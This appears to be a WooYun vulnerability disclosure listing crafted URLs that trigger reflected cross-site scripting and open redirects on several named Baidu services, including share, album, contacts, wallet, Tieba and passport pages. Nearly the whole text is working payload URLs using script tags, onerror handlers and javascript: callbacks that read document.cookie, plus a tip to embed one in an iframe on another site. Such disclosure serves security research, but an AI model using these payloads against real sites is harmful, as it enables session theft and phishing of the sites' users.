WooYun.org

一键分享页面：
http://s.share.baidu.com/mshare?click=1&url=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2F&uid=&to=mshare&type=text&relateUid=&pic=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2Fimg%2Fsingle%2Fthinkgiving_db4f20b.jpg%3f%27%22%3e%3chr%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e&title=%25e7%2599%25be%25e5%25ba%25a6%25e5%2588%2586%25e4%25ba%25ab&key=&sign=on&desc=&comment=&searchPic=0

收藏到百度相册：
http://up.xiangce.baidu.com/opencom/picture/fav/add?app_id=314406&url=http://imgsrc.baidu.com/forum/pic/item/46f1f736afc37931f05971b3ebc4b74543a9117c.jpg&descript=求大图&tags=百度贴吧,桌面吧&source_url=http://tieba.baidu.com/p/1803552143&callback_url=javascript:alert(document.cookie)//&charset=gbk

通讯录：
http://tongxunlu.baidu.com/rest/2.0/pim/contacts?method=add&app_id=20&param={"list":[{"dn":"aaaa<hr><img src=x onerror=alert(document.cookie)>","luid":1,"lctime":1347955820586,"lmtime":1347955820586}]}

百度钱包：
https://wallet.baidu.com/order/?status=all&stime="><img src=x onerror=alert(document.domain)>&etime="><img src=x onerror=alert(document.cookie)>&type=q_om

注册成功的提示页面：
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=http://www.wooyun.org&errno=0
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=javascript:alert(document.cookie)&errno=0
需要等待三秒才会执行..... 在别的网站里加上iframe调用比较合适

百度分享查看数据分析页面：
http://share.baidu.com/analysis/urlshare?url=http://www.baidu.com/?%27%22%3E%3Chr%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

绑定帐号：
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=http://www.wooyun.org
如果已经登录了相应平台的帐号，授权后最终会跳转到可控的返回链接
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=javascript:alert(/test/)

贴图神器xss IE6 only ：
http://tieba.baidu.com/photo/shenqi?title=&src=&pic[0]=javascript:alert(/ie6/)

绿钩302跳转：
http://m.baidu.com/share?action=preauth&arturl=http://www.qq.com